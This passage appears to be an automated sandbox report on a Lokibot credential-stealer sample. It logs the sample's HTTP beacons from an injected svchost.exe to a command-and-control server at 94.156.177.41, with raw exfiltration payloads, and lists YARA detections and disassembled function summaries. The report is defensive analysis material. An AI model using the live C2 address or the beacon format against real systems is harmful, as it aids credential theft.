Jan 3, 2025 05:36:58.368366003 CET	56480	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:58.373121977 CET	80	56480	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:58.373172998 CET	56480	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:58.377986908 CET	80	56480	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.072442055 CET	80	56480	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.072602987 CET	80	56480	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.072613001 CET	56480	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.072654009 CET	56480	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.077469110 CET	80	56480	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.208405018 CET	56481	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.213331938 CET	80	56481	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.213432074 CET	56481	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.222724915 CET	56481	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.227550030 CET	80	56481	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.227615118 CET	56481	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.232417107 CET	80	56481	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.935612917 CET	80	56481	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.935698032 CET	80	56481	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.935744047 CET	56481	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.935786009 CET	56481	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.940505028 CET	80	56481	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.991549015 CET	56482	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.996449947 CET	80	56482	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:59.996542931 CET	56482	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:59.998589039 CET	56482	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.003411055 CET	80	56482	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.003475904 CET	56482	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.008363962 CET	80	56482	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.713458061 CET	80	56482	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.713505983 CET	80	56482	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.713557959 CET	56482	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.714531898 CET	56482	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.719341993 CET	80	56482	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.876185894 CET	56483	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.881207943 CET	80	56483	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.881287098 CET	56483	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.883291960 CET	56483	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.888056993 CET	80	56483	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:00.888134003 CET	56483	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:00.892966032 CET	80	56483	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:01.736325979 CET	80	56483	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:01.736469030 CET	80	56483	94.156.177.41	192.168.2.4
Jan 3, 2025 05:37:01.736515045 CET	56483	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:37:06.012151957 CET	56483	80	192.168.2.4	94.156.177.41

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	56480	94.156.177.41	80	6512	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 05:36:58.368366003 CET	244	OUT	POST /alpha/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 7FD26B34 Content-Length: 176 Connection: close
Jan 3, 2025 05:36:58.373172998 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones124406JONES-PCk0FDD42EE188E931437F4FBE2Cec9eo
Jan 3, 2025 05:36:59.072442055 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 03 Jan 2025 04:36:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	56481	94.156.177.41	80	6512	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 05:36:59.222724915 CET	244	OUT	POST /alpha/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 7FD26B34 Content-Length: 176 Connection: close
Jan 3, 2025 05:36:59.227615118 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones124406JONES-PC+0FDD42EE188E931437F4FBE2CHHzQg
Jan 3, 2025 05:36:59.935612917 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 03 Jan 2025 04:36:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	56482	94.156.177.41	80	6512	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 05:36:59.998589039 CET	244	OUT	POST /alpha/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 7FD26B34 Content-Length: 149 Connection: close
Jan 3, 2025 05:37:00.003475904 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Jan 3, 2025 05:37:00.713458061 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 03 Jan 2025 04:37:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	56483	94.156.177.41	80	6512	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 05:37:00.883291960 CET	244	OUT	POST /alpha/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 7FD26B34 Content-Length: 149 Connection: close
Jan 3, 2025 05:37:00.888134003 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Jan 3, 2025 05:37:01.736325979 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 03 Jan 2025 04:37:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Target ID:	0
Start time:	23:36:54
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\ZsRFRjkt9q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZsRFRjkt9q.exe"
Imagebase:	0x400000
File size:	1'023'488 bytes
MD5 hash:	7F04A1D1824B3EC895B377A60C065145
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:36:55
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZsRFRjkt9q.exe"
Imagebase:	0x740000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1706217472.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1706020883.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	7.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	52

Executed Functions

Function 0042B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
Instruction ID: e0f5de3d63888374dd379d58e7dc1cccdf18031ddaac7846d59f909699946da1
Opcode Fuzzy Hash: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
Instruction Fuzzy Hash: F3326175B022288BCB24DF55EC81AEAB7B5FF46314F5440DAE40AE7A81D7349D80CF96

Function 00403D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8

Part of subcall function 00406430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403DEE,004C1148,?,?,?,?,?,00403AA3,?), ref: 00406471

SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B28F4,00000010), ref: 00471CCE
SetCurrentDirectoryW.KERNEL32(?,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0049DAB4,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00403AA3), ref: 00471D90

Part of subcall function 00403E6E: GetSysColorBrush.USER32(0000000F), ref: 00403E79
Part of subcall function 00403E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
Part of subcall function 00403E6E: LoadIconW.USER32(00000063), ref: 00403E9E
Part of subcall function 00403E6E: LoadIconW.USER32(000000A4), ref: 00403EB0
Part of subcall function 00403E6E: LoadIconW.USER32(000000A2), ref: 00403EC2
Part of subcall function 00403E6E: RegisterClassExW.USER32(?), ref: 00403F30

Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004036E6
Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
Part of subcall function 004036B8: ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 0040371B
Part of subcall function 004036B8: ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 00403724

Part of subcall function 00404FFC: _memset.LIBCMT ref: 00405022
Part of subcall function 00404FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004050CB

Strings

runas, xrefs: 00471D84
()K, xrefs: 00471D49
This is a third-party compiled AutoIt script., xrefs: 00471CC8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()K$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-361992462
Opcode ID: 2673fffd155b1a3d9f8afd6ed43f79e51a2c23bacc7fdd44c4544ed53d5f660a
Instruction ID: 8c2ea3201cdb187de0b382d93636e43dc28cc5d5927fe16ad7bbb767c2a6e17f
Opcode Fuzzy Hash: 2673fffd155b1a3d9f8afd6ed43f79e51a2c23bacc7fdd44c4544ed53d5f660a
Instruction Fuzzy Hash: 9B51D230E04248AACF11ABB5DC41EEE7B799B0A704F04817FF541762E2CE7C4A458B6D

Function 00403742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.USER32(?,?,?,?), ref: 004037B3
KillTimer.USER32(?,00000001), ref: 004037DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00403800
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0040380B
CreatePopupMenu.USER32 ref: 0040381F
PostQuitMessage.USER32(00000000), ref: 0040382E

Strings

TaskbarCreated, xrefs: 00403806

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: b526de3360f371aa9fd348d5304f4a1f298b10c5c3e6a1f2efe16285e463237c
Instruction ID: 9818f98b5f829a4c8db2a31be09732de94f6fcc06798172ad55270a3605b7810
Opcode Fuzzy Hash: b526de3360f371aa9fd348d5304f4a1f298b10c5c3e6a1f2efe16285e463237c
Instruction Fuzzy Hash: D44115F5500149ABDB145F699C4AFBA3A59FB41302F00853BF902B32E2DB7C9D51972E

Function 0041DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0041DDEC
GetCurrentProcess.KERNEL32(00000000,0049DC38,?,?), ref: 0041DEAC
GetNativeSystemInfo.KERNELBASE(?,0049DC38,?,?), ref: 0041DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF1F
GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF29
GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF35

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
Instruction ID: 8d0e3f8703e641f7dc44be798b40e30172c8f454d63aad706eb8f519579aa2d9
Opcode Fuzzy Hash: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
Instruction Fuzzy Hash: CE61A4B1C0A384DBCF15CF6498C01EA7FB46F29300B1989DAD8495F34BC628C649CB6E

Function 0040406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0040449E,?,?,00000000,00000001), ref: 0040407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0040449E,?,?,00000000,00000001), ref: 00404092
LoadResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F1A
SizeofResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F2F
LockResource.KERNEL32(0040449E,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB,00000000), ref: 00474F42

Strings

SCRIPT, xrefs: 00404088

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
Instruction ID: f77eb1c464526354bceaabec8d79980ec563cae601d2e2506ae7cf38a943322b
Opcode Fuzzy Hash: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
Instruction Fuzzy Hash: 27112E71600701AFE7219B65EC48F677BB9EBC5B51F1045BDF612A62D0DB75DC008A24

Function 00446CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00472F49), ref: 00446CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00446CCA
FindClose.KERNEL32(00000000), ref: 00446CDA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
Instruction ID: 78d71e6d327d38dcb7c1aa5d0e34089853346cf5f0f87180683a2751a0062266
Opcode Fuzzy Hash: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
Instruction Fuzzy Hash: 2AE0D831C1151057A2146738EC4D8EE376CDE06339F100B1AF871C12D0EB74D90046DF

Function 00413200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

L, xrefs: 0047933E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharUpper
String ID: L
API String ID: 3964851224-249544069
Opcode ID: 4310868b2b26861edb084dab6b77cb2c74600d67e3fe464b4a73d06daa09dc81
Instruction ID: 7c9fdd5cd437a79d1c3c0ac98f7823f3fe2e1a6fd868af1480b8a04681f0d1cc
Opcode Fuzzy Hash: 4310868b2b26861edb084dab6b77cb2c74600d67e3fe464b4a73d06daa09dc81
Instruction Fuzzy Hash: F8927E706083419FD714DF19C480BABB7E1BF84308F14885EE99A8B352D779ED85CB5A

Function 0040E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959
timeGetTime.WINMM ref: 0040EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040ED2E
TranslateMessage.USER32(?), ref: 0040ED3F
DispatchMessageW.USER32(?), ref: 0040ED4A
LockWindowUpdate.USER32(00000000), ref: 0040ED79
DestroyWindow.USER32 ref: 0040ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040ED9F
Sleep.KERNEL32(0000000A), ref: 00475270
TranslateMessage.USER32(?), ref: 004759F7
DispatchMessageW.USER32(?), ref: 00475A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00475A19

Strings

@GUI_WINHANDLE, xrefs: 00475360
@GUI_CTRLHANDLE, xrefs: 004753AC
@TRAY_ID, xrefs: 004754C9
@GUI_CTRLID, xrefs: 00475314

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
